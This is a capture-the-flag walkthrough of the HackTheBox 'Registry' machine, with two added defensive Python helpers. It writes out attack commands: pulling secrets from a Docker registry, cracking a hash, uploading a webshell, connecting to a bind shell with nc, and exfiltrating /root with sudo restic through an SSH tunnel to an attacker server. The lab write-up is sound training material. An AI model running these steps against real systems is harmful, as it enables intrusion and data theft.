Hackthebox - Registry server



Registry is a retired Linux server on the HackTheBox penetration testing lab. It was marked with Hard difficulty and can be cracked by using weaknesses in a Docker registry, Bolt CMS and the Restic backup software. There are two ways to proceed with this server. The first one was to install Docker on a local system and import the image found. I chose not to do this and used a bit of reverse engineering & searched the image manually. 
As usual, I am going to try to write the entire walkthrough as detailed as possible, so it is clear to everyone what is being done and why. 



We will use/learn: nmap, gobuster, Docker, White Wolf Webshell, reverse shell, Bolt CMS, Restic, port forwarding

Getting User:

I am going to add the server's IP (10.10.10.159) to /etc/hosts file, so I can keep using the hostname (registry.htb) instead of the IP address.

Let's start with a basic enumeration of the ports & services running on the server with nmap (Nmap ("Network Mapper") is a free and open-source utility for network discovery and security auditing. Source).  

For those not familiar with the command I suggest checking this cheat-sheet first:  CheatSheet

command: nmap -sC -sV -A -p- registry.htb

PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 72:d4:8d:da:ff:9b:94:2a:ee:55:0c:04:30:71:88:93 (RSA)
|   256 c7:40:d0:0e:e4:97:4a:4f:f9:fb:b2:0b:33:99:48:6d (ECDSA)
|_  256 78:34:80:14:a1:3d:56:12:b4:0a:98:1f:e6:b4:e8:93 (ED25519)
80/tcp  open  http     nginx 1.14.0 (Ubuntu)
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: Welcome to nginx!
443/tcp open  ssl/http nginx 1.14.0 (Ubuntu)
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: Welcome to nginx!
| ssl-cert: Subject: commonName=docker.registry.htb
| Not valid before: 2019-05-06T21:14:35
|_Not valid after:  2029-05-03T21:14:35

So let's modify the /etc/hosts and add docker.registry.htb there as well

https://docker.registry.htb shows an empty page, so let's try gobuster to see if we can find something. (Gobuster is a tool used to brute-force URIs (directories and files) on web sites, DNS subdomains (with wildcard support) etc. You can download it here)

root@kali:~/Downloads/HTB/registry.htb# 
gobuster dir -u http://docker.registry.htb -w /usr/share/seclists/Discovery/Web-Content/common.txt -x php,html,js,txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://docker.registry.htb
[+] Threads:        10
[+] Wordlist:       /usr/share/seclists/Discovery/Web-Content/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     php,html,js,txt
[+] Timeout:        10s
===============================================================
2020/03/10 13:56:42 Starting gobuster
===============================================================
/v2 (Status: 301)
===============================================================
2020/03/10 13:57:43 Finished
===============================================================

And we can see it finds the v2 directory! 

https://docker.registry.htb/v2 asks for username and password. Hydra kept getting me lots of false positives (the system is most likely protected against a brute-force attack), so let’s try guessing. Admin/admin works! I tried to gobuster &  wfuzz the v2 directory further, but it did not find anything. 

So let's study Docker a little: Docker_Link. There you can find out that a Docker registry exposes a catalog of its repositories, which by default is accessible via v2/_catalog: 


So let's check what is in there: 

This part really took me a while to figure out, with help from the HTB forum. We have a bolt-image repository, which is accessible under ../v2/ . So now we have another part of the puzzle: https://docker.registry.htb/v2/bolt-image/ ... 

So let's download the latest bolt-image manifest:


The manifest looks like this: 
root@kali:~/Downloads/HTB/registry.htb# cat latest 
{
   "schemaVersion": 1,
   "name": "bolt-image",
   "tag": "latest",
   "architecture": "amd64",
   "fsLayers": [
      {
         "blobSum": "sha256:302bfcb3f10c386a25a58913917257bd2fe772127e36645192fa35e4c6b3c66b"
      },
      {
         "blobSum": "sha256:3f12770883a63c833eab7652242d55a95aea6e2ecd09e21c29d7d7b354f3d4ee"
      },
      {
         "blobSum": "sha256:02666a14e1b55276ecb9812747cb1a95b78056f1d202b087d71096ca0b58c98c"
      },
      {
         "blobSum": "sha256:c71b0b975ab8204bb66f2b659fa3d568f2d164a620159fc9f9f185d958c352a7"
...
...
...

So let's start checking them. Download the first one:

https://docker.registry.htb/v2/bolt-image/blobs/sha256:3f12770883a63c833eab7652242d55a95aea6e2ecd09e21c29d7d7b354f3d4ee

And check what they are with the file command, as we cannot read them directly. It looks like a gzip file: 

file sha256_302bfcb3f10c386a25a58913917257bd2fe772127e36645192fa35e4c6b3c66b 
 gzip compressed data, original size modulo 2^32 6656

So I renamed it to *.gz file and unpacked:
root@kali:~/Downloads/HTB/registry.htb# mv sha256_302bfcb3f10c386a25a58913917257bd2fe772127e36645192fa35e4c6b3c66b 1.gz
root@kali:~/Downloads/HTB/registry.htb# gunzip 1.gz


And in the first file we can see a password, GkOcz221Ftb3ugog, in an expect script that unlocks root's SSH key:
^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@#!/usr/bin/expect -f
#eval `ssh-agent -s`
spawn ssh-add /root/.ssh/id_rsa
expect "Enter passphrase for /root/.ssh/id_rsa:"
send "GkOcz221Ftb3ugog\n";
expect "Identity added: /root/.ssh/id_rsa (/root/.ssh/id_rsa)"
interact
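As an added example (not code from the original walkthrough), here is a small Python script that does what the last few steps did by hand, but in a way a defender can run against their own registry: it walks the v2 API (catalog, tags, manifest), reads the layer digests from a schema 1 (fsLayers) or schema 2 (layers) manifest, verifies that a downloaded blob really hashes to the digest the manifest names, detects gzip the same way the file command did, and scans the layer tarball for secret-like content such as the expect "send" line found here. The registry responses, the layer tarball and the path inside it are constructed in the script; the walk_registry function takes a fetch callback, so in real use you would pass one that performs the HTTP GET with your credentials.

```python
import gzip
import hashlib
import io
import json
import re
import tarfile

# --- constructed sample data (not taken from the box) ---------------------
SAMPLE_PATH = "home/bolt/unlock-key.sh"   # hypothetical path inside the layer

def build_sample_layer() -> bytes:
    """Tiny layer tarball holding an expect script like the one found, gzip-compressed
    the way registry blobs are stored."""
    script = (b'#!/usr/bin/expect -f\n'
              b'spawn ssh-add /root/.ssh/id_rsa\n'
              b'send "GkOcz221Ftb3ugog\\n";\n'
              b'interact\n')
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        info = tarfile.TarInfo(SAMPLE_PATH)
        info.size = len(script)
        tar.addfile(info, io.BytesIO(script))
    return gzip.compress(buf.getvalue())

SAMPLE_LAYER = build_sample_layer()
SAMPLE_MANIFEST = json.dumps({
    "schemaVersion": 1, "name": "bolt-image", "tag": "latest",
    "fsLayers": [{"blobSum": "sha256:" + hashlib.sha256(SAMPLE_LAYER).hexdigest()}],
})

# In-memory stand-in for the registry: API path -> response body.
FAKE_REGISTRY = {
    "/v2/_catalog": b'{"repositories":["bolt-image"]}',
    "/v2/bolt-image/tags/list": b'{"name":"bolt-image","tags":["latest"]}',
    "/v2/bolt-image/manifests/latest": SAMPLE_MANIFEST.encode(),
}

# --- registry walking ------------------------------------------------------
def layer_digests(manifest_text: str) -> list:
    """Layer digests from a schema 1 (fsLayers/blobSum) or schema 2 (layers/digest) manifest."""
    m = json.loads(manifest_text)
    if m.get("schemaVersion") == 1:
        return [layer["blobSum"] for layer in m["fsLayers"]]
    return [layer["digest"] for layer in m["layers"]]

def walk_registry(fetch) -> dict:
    """fetch(path) -> bytes. Returns {repo: {tag: [digest, ...]}} using the v2 API paths."""
    out = {}
    for repo in json.loads(fetch("/v2/_catalog"))["repositories"]:
        out[repo] = {}
        for tag in json.loads(fetch(f"/v2/{repo}/tags/list"))["tags"]:
            out[repo][tag] = layer_digests(fetch(f"/v2/{repo}/manifests/{tag}").decode())
    return out

# --- blob checks -----------------------------------------------------------
def verify_blob(digest: str, data: bytes) -> bool:
    """Blobs are content-addressed: the data must hash to the digest the manifest names."""
    algo, _, expected = digest.partition(":")
    return hashlib.new(algo, data).hexdigest() == expected

def is_gzip(data: bytes) -> bool:
    return data[:2] == b"\x1f\x8b"   # the same magic bytes the file command keys on

SECRET_PATTERNS = {
    "expect send": re.compile(rb'send\s+"([^"\\]+)'),
    "private key": re.compile(rb"(-----BEGIN [A-Z ]*PRIVATE KEY-----)"),
}

def scan_layer(data: bytes) -> list:
    """Return (path, label, match) tuples for secret-like content in a layer tarball."""
    raw = gzip.decompress(data) if is_gzip(data) else data
    findings = []
    with tarfile.open(fileobj=io.BytesIO(raw), mode="r:") as tar:
        for member in tar:
            if not member.isfile():
                continue
            content = tar.extractfile(member).read()
            for label, pat in SECRET_PATTERNS.items():
                for hit in pat.finditer(content):
                    findings.append((member.name, label, hit.group(1).decode(errors="replace")))
    return findings

if __name__ == "__main__":
    fetch = lambda path: FAKE_REGISTRY[path]
    for repo, tags in walk_registry(fetch).items():
        for tag, digests in tags.items():
            for digest in digests:
                blob = SAMPLE_LAYER   # in real use: GET /v2/<repo>/blobs/<digest>
                print(repo, tag, digest[:19], "digest ok" if verify_blob(digest, blob) else "MISMATCH")
                for path, label, match in scan_layer(blob):
                    print(f"  {path}: {label} -> {match}")
```

The digest check matters in both directions: it is how a client notices a tampered or corrupted blob, and it is why renaming the downloaded file to 1.gz was harmless, since the name carries no meaning and the content is what the manifest commits to.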

So now we have the passphrase, but we don't have any username. In the 5th file (the 100 MB one) there is a private key! 

-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,1C98FA248505F287CCC597A59CF83AB9

KF9YHXRjDZ35Q9ybzkhcUNKF8DSZ+aNLYXPL3kgdqlUqwfpqpbVdHbMeDk7qbS7w
KhUv4Gj22O1t3koy9z0J0LpVM8NLMgVZhTj1eAlJO72dKBNNv5D4qkIDANmZeAGv
...
...
...
94Vcvj5Kmzv0FxwVu4epWNkLTZCJPBszTKiaEWWS+OLDh7lrcmm+GP54MsLBWVpr
-----END RSA PRIVATE KEY-----

Now we can log in as user bolt:

ssh -i ./private_key bolt@registry
Enter passphrase for key './private_key': 
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-65-generic x86_64)

  System information as of Tue Mar 10 22:49:08 UTC 2020

  System load:  0.0               Users logged in:                0
  Usage of /:   5.7% of 61.80GB   IP address for eth0:            10.10.10.159
  Memory usage: 26%               IP address for br-1bad9bd75d17: 172.18.0.1
  Swap usage:   0%                IP address for docker0:         172.17.0.1
  Processes:    154
Last login: Tue Mar 10 09:41:06 2020 from 10.10.14.33
bolt@bolt:~$

Note that the passphrase is GkOcz221Ftb3ugog, not GkOcz221Ftb3ugog\n: the \n in the expect script is the newline that ends the input, not part of the passphrase. Now we can read the user flag in the user.txt file. 

Getting Root:

After enumerating the system, we find a database file at /var/www/html/bolt/app/database/bolt.db

When we inspect the file, we see a bcrypt hash in it:


^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@<81>-^A^Q^@^W<81>^E/3!^W7   
@^H^@3admin$2y$10$e.ChUytg9SrL7AsboF2bX.wWKQ1LkS5Fi3/Z0yYD86.P5E9cpY7PKbolt@registry.htb2019-10-17 
14:34:5210.10.14.2Admin["files://shell.php"]["root","everyone"]

The hash can be cracked with the John the Ripper tool (John the Ripper is a fast password cracker, currently available for many flavors of Unix, macOS, Windows, DOS, BeOS, and OpenVMS. Source). The hash itself is the 60-character string $2y$10$e.ChUytg9SrL7AsboF2bX.wWKQ1LkS5Fi3/Z0yYD86.P5E9cpY7PK; what follows it (bolt@registry.htb, the timestamp and so on) is the content of the neighbouring columns. Let's store the hash in a db_hash.txt file and crack it: 

root@kali:~/Downloads/HTB/registry.htb# 
john --wordlist=/usr/share/wordlists/rockyou.txt /root/Downloads/HTB/registry.htb/db_hash.txt 
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
strawberry       (?)
1g 0:00:00:04 DONE (2020-03-11 18:52) 0.2016g/s 72.58p/s 72.58c/s 72.58C/s strawberry..brianna
Use the "--show" option to display all of the cracked passwords reliably
Session completed

So we have admin's password. However, we still don't have a place to use it. So step back and think WHERE we found the hash. It was in the /var/www/html/bolt directory, which is the web root of the site. Let's try http://registry.htb/bolt in the browser. And it brings up a page!  

Let's scan it with gobuster again. As the enumeration found a database, I am expecting to find a login page to the DB. We need to change our wordlist to dirbuster's directory-list-2.3-medium.txt. 

root@kali:~/Downloads/HTB/registry.htb# gobuster dir -u http://registry.htb/bolt -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x php,html,js,txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://registry.htb/bolt
[+] Threads:        10
[+] Wordlist:       /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     php,html,js,txt
[+] Timeout:        10s
===============================================================
2020/03/11 19:06:16 Starting gobuster
===============================================================
/index.php (Status: 200)
/files (Status: 301)
/tests (Status: 301)
/src (Status: 301)
/app (Status: 301)
/theme (Status: 301)
/vendor (Status: 301)
/extensions (Status: 301)
/bolt (Status: 302)

and we find another /bolt! So let's open http://registry.htb/bolt/bolt in the browser and we get a login page: 



I checked several exploits (with Metasploit) for Bolt CMS, but none of them seemed to work for me. So I checked the HTB forum and someone suggested that we are able to edit the main config file and modify it so we can upload our shell. Basically we allow ourselves to upload a PHP shell by adding the php suffix to the list of allowed files. But first download the bind shell (after hours of testing I found out that the reverse shell does not work!!!). The bind shell can be found here: Download

Upload it to the server: scp -i id_rsa bindshell.py bolt@registry.htb:/tmp 

Now edit the config so that PHP files are allowed to be uploaded, and save it.

Now you have to be really quick. Go to File Management, select upload file, upload your White Wolf webshell and open it. In the White Wolf webshell's command line run python /tmp/bindshell.py . 

and on your Kali Linux machine run:

nc  10.10.10.159 2400
[3881] bindshell on port 2400
password? mtso   <--- password is needed!!!!
www-data@bolt:~/html/bolt/files$


and you get a shell as the www-data user. The "sudo -l" command shows us we can run restic as root:

www-data@bolt:~/html/bolt/files$ sudo -l 
Matching Defaults entries for www-data on bolt:
    env_reset, exempt_group=sudo, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on bolt:
    (root) NOPASSWD: /usr/bin/restic backup -r rest*
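The rule above is worth reading carefully: the repository argument is a wildcard (rest*), so whoever holds the www-data account chooses where root's backup goes, and sudoers wildcards also match white space, so a trailing * admits further arguments as well. As an added example (not part of the original walkthrough), here is a Python audit helper that parses "sudo -l" output like the listing above and flags exactly those properties; it is the check a defender would run over a fleet before an attacker reads the same line. The sample output is constructed: the restic rule is the one shown on this box, the systemctl rule is a hypothetical one added for contrast.

```python
import re
from dataclasses import dataclass, field

# Constructed `sudo -l` output; the second rule is hypothetical and only there for contrast.
SUDO_L_SAMPLE = r"""Matching Defaults entries for www-data on bolt:
    env_reset, exempt_group=sudo, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on bolt:
    (root) NOPASSWD: /usr/bin/restic backup -r rest*
    (root) /usr/bin/systemctl restart nginx
"""

@dataclass
class SudoRule:
    runas: str
    nopasswd: bool
    command: str
    args: list = field(default_factory=list)

# "(root) NOPASSWD: /usr/bin/restic backup -r rest*" -> runas, tags, command, remaining args
RULE_RE = re.compile(r"^\s*\(([^)]+)\)\s*((?:[A-Z]+:\s*)*)(\S+)(.*)$")

def parse_sudo_l(text: str) -> list:
    """Parse the command section of `sudo -l` output into SudoRule objects."""
    rules, in_commands = [], False
    for line in text.splitlines():
        if line.startswith("User ") and "may run" in line:
            in_commands = True      # everything before this is the Defaults section
            continue
        if not in_commands:
            continue
        m = RULE_RE.match(line)
        if m:
            runas, tags, command, rest = m.groups()
            rules.append(SudoRule(runas, "NOPASSWD:" in tags, command, rest.split()))
    return rules

def _has_wildcard(arg: str) -> bool:
    return any(ch in arg for ch in "*?[")

def audit_rule(rule: SudoRule) -> list:
    """Return human-readable findings for one rule; an empty list means nothing was flagged."""
    findings = []
    for i, arg in enumerate(rule.args):
        if not _has_wildcard(arg):
            continue
        findings.append(f"wildcard argument {arg!r}: the caller chooses part of the command line")
        # sudoers wildcards match white space too, so a trailing '*' accepts extra arguments
        if i == len(rule.args) - 1 and arg.endswith("*"):
            findings.append("trailing wildcard: arbitrary extra arguments are accepted")
        # restic's -r / --repo selects the backup destination
        if i > 0 and rule.args[i - 1] in ("-r", "--repo"):
            findings.append("repository target is caller-controlled: files readable by "
                            f"{rule.runas} can be backed up to any repository")
    if rule.nopasswd and findings:
        findings.append("NOPASSWD: no credential is needed to exercise the above")
    return findings

def audit(text: str) -> dict:
    """Map each rule's command line to its findings."""
    return {f"{r.command} {' '.join(r.args)}".strip(): audit_rule(r) for r in parse_sudo_l(text)}

if __name__ == "__main__":
    for cmd, issues in audit(SUDO_L_SAMPLE).items():
        print(cmd, "-> OK" if not issues else "")
        for issue in issues:
            print("   -", issue)
```

The fix on the defender's side is to pin the repository in the rule (a fixed path or URL instead of rest*) or to wrap restic in a script that hard-codes the destination, so that the privileged command has no caller-controlled argument left.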

Restic is a backup tool (Link). So the plan is to back up the /root directory as root and "restore" it on my own machine. That way I should be able to read the root.txt file stored in root's home directory, or better, obtain root's private SSH key. 
Let’s install it on the Kali box: 

command: apt-get install restic

Initialize the repository:

root@kali:~/Downloads/HTB/registry.htb# restic init --repo /root/Downloads/HTB/registry.htb/restic_backup
enter password for new repository:  <---- pavel 
enter password again:  <---- pavel
created restic repository 518c14029a at /root/Downloads/HTB/registry.htb/restic_backup

Add the password to your password manager, as once you lose it you won't have access to your repository again. Now we need rest-server, the HTTP backend that restic's rest: repository type talks to, so the backup can be sent to our machine. Get it from GitHub:

root@kali:~/Downloads/scripts# git clone https://github.com/restic/rest-server.git
Cloning into 'rest-server'...
remote: Enumerating objects: 32, done.
remote: Counting objects: 100% (32/32), done.
remote: Compressing objects: 100% (27/27), done.
remote: Total 3136 (delta 11), reused 17 (delta 5), pack-reused 3104
Receiving objects: 100% (3136/3136), 5.63 MiB | 4.15 MiB/s, done.
Resolving deltas: 100% (1158/1158), done.

Also install the Go toolchain (apt-get install golang-go), then compile & install rest-server: 
root@kali:~/Downloads/scripts/rest-server# make 
root@kali:~/Downloads/scripts/rest-server# make install
/usr/bin/install -m 755 rest-server /usr/local/bin/rest-server

And run it: 

root@kali:~/Downloads/scripts/rest-server# rest-server --path /root/Downloads/HTB/registry.htb/restic_backup/ --no-auth
Data directory: /root/Downloads/HTB/registry.htb/restic_backup/
Authentication disabled
Private repositories disabled
Starting server on :8000

rest-server listens on port 8000, so let's set up a remote port forward: port 8000 on the server's loopback interface is tunnelled back over SSH to rest-server on our Kali box (10.10.14.6:8000), so a backup run on the server ends up in our repository (In computer networking, port forwarding or port mapping is an application of network address translation (NAT) that redirects a communication request from one address and port number combination to another while the packets are traversing a network gateway, such as a router or firewall. Wikipedia):

root@kali:~/Downloads/HTB/registry.htb# ssh -R 8000:10.10.14.6:8000 -i ./private_key bolt@registry.htb
Enter passphrase for key './private_key': 
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-65-generic x86_64)

  System information as of Wed Mar 11 21:35:19 UTC 2020

  System load:  0.0               Users logged in:                1
  Usage of /:   6.1% of 61.80GB   IP address for eth0:            10.10.10.159
  Memory usage: 34%               IP address for br-1bad9bd75d17: 172.18.0.1
  Swap usage:   0%                IP address for docker0:         172.17.0.1
  Processes:    164

  => There is 1 zombie process.
Last login: Wed Mar 11 21:33:19 2020 from 10.10.14.6
bolt@bolt:~$ 


Now switch back to the www-data shell and run a backup of the /root directory, pointing -r at the forwarded port:

www-data@bolt:~/html/bolt/files$ 
sudo restic backup -r rest:http://127.0.0.1:8000/restic_backup /root
<p -r rest:http://127.0.0.1:8000/restic_backup /root
enter password for repository: pavel

password is correct
found 2 old cache directories in /var/www/.cache/restic, pass --cleanup-cache to remove them
scan [/root]
scanned 10 directories, 14 files in 0:00
[0:00] 100.00%  28.066 KiB / 28.066 KiB  24 / 24 items  0 errors  ETA 0:00 
duration: 0:00
snapshot 51ae3cc4 saved

And restore it on the local Kali machine: 

root@kali:~/Downloads/HTB/registry.htb/restic_backup# 
restic -r restic_backup restore latest --target restore

enter password for repository:  pavel
repository aa0befce opened successfully, password is correct
created new cache in /root/.cache/restic
restoring <Snapshot 51ae3cc4 of [/root] at 2020-03-11 21:49:14.025333836 +0000 UTC by root@bolt> to restore

Once the restore is complete, you can read the root.txt file: 

root@kali:~/Downloads/HTB/registry.htb/restic_backup/restore/root# cat root.txt 
ntrkz......tgw










